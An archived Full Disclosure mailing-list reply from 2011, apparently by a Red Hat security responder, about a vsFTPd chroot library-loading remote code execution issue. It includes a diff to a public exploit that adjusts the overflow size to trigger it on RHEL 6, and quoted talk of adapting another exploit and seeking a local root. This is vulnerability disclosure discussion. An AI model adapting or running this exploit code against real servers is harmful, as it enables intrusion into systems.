Full Disclosure mailing list archives
Re: vsFTPd remote code execution
From: Ramon de C Valle <rcvalle () redhat com>
Date: Tue, 13 Dec 2011 15:12:56 -0500 (EST)
as you can obviously see vsftpd loads the /lib/libgcc_s.so.1 inside the chroot, so voila we have the same issue as with FreeBSD ftpd/proftpd. I am now looking into the possibility to modify http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c and use as the library. It will be a fun Proof of Concept.
Hats off to you! :)
Anyone with an up2date linux local root which only makes use of syscalls? :> All this was tested on a CentOS 5.5 installation, vsFTPd 2.3.4 was compiled from sources and launched from xinetd.
I've also triggered this in RHEL 6 with its latest version of vsftpd installed with the following changes made to dividead's exploit: --- a.c 2011-12-13 18:05:50.701999990 -0200 +++ b.c 2011-12-13 18:06:26.874000006 -0200 @@ -59,8 +59,8 @@ total_size = ((total_size + __alignof__ (struct ttinfo) - 1) & ~(__alignof__ (struct ttinfo) - 1)); - /* value of chars, to get a malloc(0) */ - evil2 = 0 - total_size; + /* value of chars, to get a malloc(500) */ + evil2 = 0 - total_size + 500; PUT_32BIT_MSB(evil.tzh_charcnt, evil2); p = (char *)&evil; @@ -68,6 +68,6 @@ printf("%c", p[i]); /* data we overflow with */ - for (i = 0; i < 50000; i++) + for (i = 0; i < 500000; i++) printf("A"); } -- Ramon de C Valle / Red Hat Security Response Team
Attachment:
mkevil2.c
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- vsFTPd remote code execution HI-TECH . (Dec 13)
- Re: vsFTPd remote code execution Dan Rosenberg (Dec 13)
- Re: vsFTPd remote code execution HI-TECH . (Dec 13)
- Re: vsFTPd remote code execution Dan Rosenberg (Dec 13)
- Re: vsFTPd remote code execution HI-TECH . (Dec 13)
- Re: vsFTPd remote code execution Chris Evans (Dec 13)
- Re: vsFTPd remote code execution HI-TECH . (Dec 15)
- Re: vsFTPd remote code execution xD 0x41 (Dec 15)
- Re: vsFTPd remote code execution Chris Evans (Dec 17)
- Re: vsFTPd remote code execution HI-TECH . (Dec 13)
- Re: vsFTPd remote code execution Dan Rosenberg (Dec 13)
- Re: vsFTPd remote code execution HI-TECH . (Dec 13)